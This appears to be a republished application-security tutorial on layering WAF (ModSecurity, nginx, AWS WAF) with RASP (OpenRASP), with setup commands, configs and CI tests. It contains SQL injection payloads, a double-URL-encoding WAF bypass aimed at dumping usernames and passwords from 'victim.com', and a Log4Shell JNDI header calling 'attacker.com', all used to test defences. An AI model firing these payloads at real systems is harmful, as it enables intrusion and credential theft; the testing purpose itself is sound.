
Introduction:
Web Application Firewalls (WAFs) filter malicious traffic at the network edge, blocking SQLi, XSS, and DDoS attacks before they reach your app. Runtime Application Self-Protection (RASP) lives inside the application, monitoring actual code execution and API calls to stop zero-day exploits that bypass perimeter defenses. Combining both creates a layered security architecture that protects from the outside in and the inside out.
Learning Objectives:
- Understand the architectural differences between WAF and RASP, including deployment models and detection logic.
- Implement a basic WAF rule set using ModSecurity on Linux and configure RASP hooks in a sample Java web app.
- Analyze attack scenarios (SQL injection, Log4j) to determine which technology mitigates which phase of the kill chain.
You Should Know:
- Deploying Open Source WAF with ModSecurity on Ubuntu 22.04
ModSecurity is the industry-standard open-source WAF engine. The following commands install it for Apache2 together with the OWASP Core Rule Set (CRS).
Step-by-step guide – What this does:
This setup places a reverse-proxy style filter in front of your web server. Every HTTP request is inspected against CRS rules; malicious payloads are blocked before reaching the app logic.
```bash
# Update system and install Apache2 with ModSecurity
sudo apt update && sudo apt upgrade -y
sudo apt install apache2 libapache2-mod-security2 -y

# Enable the module and restart Apache
sudo a2enmod security2
sudo systemctl restart apache2

# Download and configure OWASP CRS
cd /tmp
git clone https://github.com/coreruleset/coreruleset.git
sudo mkdir -p /usr/share/modsecurity-crs
sudo cp -r coreruleset/rules /usr/share/modsecurity-crs/
sudo cp coreruleset/crs-setup.conf.example /etc/modsecurity/crs-setup.conf

# Enable CRS in ModSecurity config
# The Debian/Ubuntu package only ships modsecurity.conf-recommended; copy it
# first so the sed below has a modsecurity.conf to edit.
sudo cp /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf
sudo sed -i 's/SecRuleEngine DetectionOnly/SecRuleEngine On/' /etc/modsecurity/modsecurity.conf
sudo sed -i 's/SecDefaultAction "phase:1,log,auditlog,pass"/SecDefaultAction "phase:1,log,auditlog,deny,status:403"/' /etc/modsecurity/crs-setup.conf
# Apache must also load crs-setup.conf and the rules directory, e.g. via Include
# lines in /etc/apache2/mods-enabled/security2.conf, then be restarted.
sudo systemctl restart apache2

# Test with a SQLi attempt
curl "http://localhost/index.php?id=1' OR '1'='1" -I
# Expected: HTTP/1.1 403 Forbidden
```
Windows equivalent (IIS with ModSecurity via MSI):
Download ModSecurity for IIS from GitHub, install using the provided MSI, then edit `c:\Program Files\ModSecurity IIS\modsecurity.conf` to set `SecRuleEngine On` and include CRS rules.
- Instrumenting RASP Using OpenRASP in a Java Spring Boot App
OpenRASP is an open-source RASP engine that hooks into the JVM. It intercepts database queries, file system access, and command execution at runtime.
Step-by-step guide – What this does:
This adds a Java agent to your application JAR. The agent monitors actual method calls (e.g., Statement.executeQuery()) and blocks SQL injection even if the WAF missed the encoded payload.
```bash
# Download OpenRASP agent
wget https://github.com/baidu/openrasp/releases/download/v1.3.6/openrasp-v1.3.6.zip
unzip openrasp-v1.3.6.zip -d /opt/openrasp
mkdir -p /opt/openrasp/conf /var/log/openrasp

# Configure protection (enable SQLi and command injection blocking)
# (key nesting restored from the flattened original)
cat > /opt/openrasp/conf/openrasp.yml << EOF
rasp:
  enabled: true
  action: block
  sql:
    enabled: true
    action: block
  command:
    enabled: true
    action: block
log:
  level: INFO
  file: /var/log/openrasp/rasp.log
EOF

# Run your Spring Boot app with the RASP agent
java -javaagent:/opt/openrasp/rasp.jar -jar myapp.jar

# Test SQL injection (even if obfuscated)
curl -X POST http://localhost:8080/login -d "user=admin' OR '1'='1&pass=anything"
# RASP intercepts at the JDBC layer – check /var/log/openrasp/rasp.log for block events
```
- API Security – Combining WAF Rate Limiting with RASP Input Validation
Modern APIs face abuse like credential stuffing and mass assignment. WAF can enforce rate limits at the edge; RASP validates the actual data binding in the controller.
Step-by-step guide – Nginx WAF rate limiting + custom RASP validation in Node.js
```nginx
# /etc/nginx/sites-available/api – WAF rate limit rules
limit_req_zone $binary_remote_addr zone=login:10m rate=5r/m;

server {
    listen 443 ssl;
    # ssl_certificate / ssl_certificate_key directives omitted from this snippet

    location /api/login {
        limit_req zone=login burst=3 nodelay;

        # Block obvious SQLi patterns at WAF level
        # Caveat: "if" is evaluated in the rewrite phase, before nginx has read
        # the request body, so $request_body is normally still empty here; a
        # body check needs a module that runs after the body is read (njs, Lua).
        if ($request_body ~ "(\%27)|(\')|(--)|(\%23)") { return 403; }

        proxy_pass http://localhost:3000;
    }
}
```
```javascript
// RASP validation inside Express.js – checks after parsing, before business logic
const express = require('express');
const app = express();
app.use(express.urlencoded({ extended: false })); // parses the form body the curl tests send
app.use(express.json());

app.post('/api/login', (req, res) => {
  // Runtime introspection: the parsed (decoded) value is inspected, not the raw wire bytes.
  // A bare keyword match also hits legitimate names such as "selection"; tune before production.
  if (typeof req.body.user === 'string' && req.body.user.match(/(UNION|SELECT|INSERT)/i)) {
    console.error(`RASP blocked malicious login attempt: ${req.body.user}`);
    return res.status(403).json({ error: 'Invalid input' });
  }
  // Proceed only if safe (authenticate() is the app's own login routine, not shown here)
  authenticate(req.body.user, req.body.pass);
});
```
- Cloud Hardening – Deploying AWS WAF + RASP on ECS with Fargate
In cloud environments, WAF is managed by the cloud provider; RASP runs inside containers. This section shows how to enable AWS WAF on an Application Load Balancer and embed RASP in a Docker image.
Step-by-step guide – Terraform snippet for AWS WAF ACL
```hcl
resource "aws_wafv2_web_acl" "app_waf" {
  name  = "app-waf-rule"
  scope = "REGIONAL"

  default_action {
    allow {}
  }

  rule {
    name     = "AWSManagedRulesSQLiRuleSet"
    priority = 1

    override_action {
      none {}
    }

    statement {
      managed_rule_group_statement {
        name        = "AWSManagedRulesSQLiRuleSet"
        vendor_name = "AWS"
      }
    }

    visibility_config {
      cloudwatch_metrics_enabled = true
      metric_name                = "SQLiRuleMetric"
      sampled_requests_enabled   = true
    }
  }

  # Required at the web ACL level as well (missing from the original snippet)
  visibility_config {
    cloudwatch_metrics_enabled = true
    metric_name                = "AppWafMetric"
    sampled_requests_enabled   = true
  }
}

# Attach the ACL to the ALB with an aws_wafv2_web_acl_association resource
# (not shown here); without it the rules inspect no traffic.
```
Dockerfile with RASP agent for a Python Flask app (using open-source RASP like IAST-Python)
```dockerfile
FROM python:3.9-slim
WORKDIR /app
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY . .
# Inject RASP hook – wraps dangerous functions (eval, exec, SQL queries)
RUN pip install pyrasp
ENV PYTHONPATH=/usr/local/lib/python3.9/site-packages/pyrasp
CMD ["python", "-m", "pyrasp.monitor", "app.py"]
```
- Vulnerability Exploitation – How Attackers Bypass WAF but Not RASP
WAF relies on pattern matching. Attackers use encoding, fragmentation, and HTTP parameter pollution to evade signatures. RASP sees the final, decoded value inside the application.
Step-by-step guide – Simulate a WAF bypass and observe RASP interception
1. Normal SQLi payload – WAF blocks:
```bash
curl "http://victim.com/page?id=1' UNION SELECT username,password FROM users--"
```
2. WAF bypass using double URL encoding (%25 -> % -> '):
```bash
curl "http://victim.com/page?id=1%2527%20UNION%20SELECT%20username,password%20FROM%20users--"
```
   WAF sees "1%2527" (not a single quote), passes request. Backend decodes to "1' UNION..."
3. RASP in Java – the PreparedStatement hook receives the decoded string. OpenRASP log entry:
```
SQLi detected - param: id = "1' UNION SELECT username,password FROM users--"
Stack: com.mysql.jdbc.StatementImpl.executeQuery(StatementImpl.java:123)
```
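A runnable model of the three steps above, added here as an illustration and not code from OpenRASP, ModSecurity or the article: an edge signature check runs on the query string after a single URL-decode, a constructed backend decodes twice, and a sqlite3 cursor subclass stands in for the JDBC-layer hook described in the OpenRASP section, so it sees the value the application actually executes. The names (`edge_filter`, `app_decode`, `HookedCursor`, `run_scenario`), the users table row and the double-decoding behaviour are all assumptions made for the demo.

```python
import re
import sqlite3
from urllib.parse import unquote

# Edge (WAF-style) signature, applied after ONE URL-decode of the raw query
# string, the way a simple edge filter normalises input.
SQLI_SIGNATURE = re.compile(r"'\s*(OR|UNION)\b", re.IGNORECASE)

def edge_filter(raw_query: str) -> str:
    """Return 'block' or 'pass' for the query string as seen on the wire."""
    return "block" if SQLI_SIGNATURE.search(unquote(raw_query)) else "pass"

def app_decode(raw_query: str) -> str:
    """Constructed backend that decodes twice (framework, then app code):
    this is what turns %2527 into %27 and then into a bare quote."""
    value = raw_query.split("id=", 1)[1]
    return unquote(unquote(value))

class HookedCursor(sqlite3.Cursor):
    """RASP-style hook: inspects every statement right before execution,
    so it sees the fully decoded value the application really runs."""
    def execute(self, sql, params=()):
        if SQLI_SIGNATURE.search(sql):
            raise PermissionError("runtime hook blocked SQL: " + sql)
        return super().execute(sql, params)

def run_scenario(raw_query: str) -> dict:
    """Run one request through the edge filter, the vulnerable query path
    and the parameterised query path; return what each layer decided."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', 'hunter2')")  # constructed row
    decoded = app_decode(raw_query)
    cur = conn.cursor(factory=HookedCursor)
    try:
        # Vulnerable pattern: the decoded value is concatenated into the statement.
        cur.execute("SELECT username FROM users WHERE id = " + decoded)
        runtime = "executed"
    except PermissionError:
        runtime = "blocked_by_hook"
    # Same lookup with a bound parameter: the payload stays data, never SQL.
    rows = conn.cursor(factory=HookedCursor).execute(
        "SELECT username FROM users WHERE id = ?", (decoded,)).fetchall()
    conn.close()
    return {"edge": edge_filter(raw_query), "decoded": decoded,
            "runtime": runtime, "parameterised_rows": rows}
```

For the double-encoded request the edge filter returns "pass" while the hook blocks the concatenated statement; the parameterised variant returns no rows for the payload and the expected row for a plain `id=1`.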
Mitigation commands for Linux sysadmins – force RASP logging to SIEM
```bash
# Forward RASP logs to syslog for centralized monitoring
# rsyslog must read the file with imfile; the original one-line "local7. /var/log/openrasp/rasp.log"
# entry (asterisk lost in extraction) would have written facility local7 INTO rasp.log instead.
cat > /etc/rsyslog.d/openrasp.conf << 'EOF'
module(load="imfile")
input(type="imfile" File="/var/log/openrasp/rasp.log" Tag="openrasp:" Facility="local7" Severity="info")
# SIEM_HOST is a placeholder for your collector address
local7.* @@SIEM_HOST:514
EOF
systemctl restart rsyslog

# Configure auditd to capture RASP agent tampering attempts
auditctl -w /opt/openrasp/rasp.jar -p wa -k rasp_integrity
```
- Combining WAF and RASP in a DevSecOps Pipeline (CI/CD)
Automate security gate checks using both technologies during staging.
Step-by-step guide – GitHub Actions workflow that runs WAF rule tests and RASP telemetry validation
```yaml
name: AppSec Pipeline
on: [push]   # trigger assumed; the original value was garbled in extraction
jobs:
  waf-test:
    runs-on: ubuntu-latest
    steps:
      - name: Deploy test app with ModSecurity container
        run: |
          docker run -d -p 8080:80 --name waf-test owasp/modsecurity:apache
          docker cp ./app waf-test:/var/www/html/
      - name: Run malicious payload suite
        run: |
          curl -X POST http://localhost:8080/app/login -d "user=admin'--" -w "%{http_code}" -o /dev/null -s | grep 403
  rasp-scan:
    runs-on: ubuntu-latest
    steps:
      - name: Run OpenRASP enabled app in staging
        run: |
          java -javaagent:./rasp.jar -jar myapp-staging.jar &
          sleep 10
          # Simulate Log4Shell attempt (JNDI injection)
          # single quotes keep bash from treating ${jndi:...} as parameter expansion
          curl -H 'X-Api-Version: ${jndi:ldap://attacker.com/a}' http://localhost:8080/api/health
          # Check if RASP blocked it
          grep "JNDI" /var/log/openrasp/rasp.log && exit 0 || exit 1
```
What Undercode Say:
- WAF is your front door guard, RASP is the room-by-room motion sensor. RASP stops attackers who slip past the perimeter using zero-day evasion techniques.
- Compliance without RASP is blind trust. Many standards (PCI DSS v4.0, OWASP ASVS) now require runtime self-protection for critical transaction paths.
- Performance trade-offs are real but manageable. WAF adds 2-5ms latency at edge; RASP adds 10-20ms inside the JVM. Use selective instrumentation for high-throughput endpoints.
The convergence of edge and internal protection represents a maturity shift from reactive signature matching to proactive behavioral analysis. Organizations that deploy both reduce mean time to detect (MTTD) from hours to milliseconds, as RASP can halt an exploit during the same HTTP request. However, RASP requires deep integration with the application framework—something legacy monolithic apps struggle with. Microservices and serverless architectures actually benefit more from RASP because each function can carry its own protection agent.
Prediction:
By 2028, standalone WAF appliances will decline as cloud-native WAAP (Web Application and API Protection) platforms absorb WAF capabilities. RASP will evolve into eBPF-based hooks on Linux kernels, enabling zero-instrumentation protection for containers and serverless functions. Attackers will shift to business logic abuse (e.g., gift card brute-forcing, workflow bypasses) that neither WAF signatures nor current RASP behavior models detect. The next arms race will be between RASP’s context-aware anomaly detection and AI-generated adversarial inputs designed to mimic legitimate user sessions.
Reported By: Cybersecurity Appsec – Hackers Feeds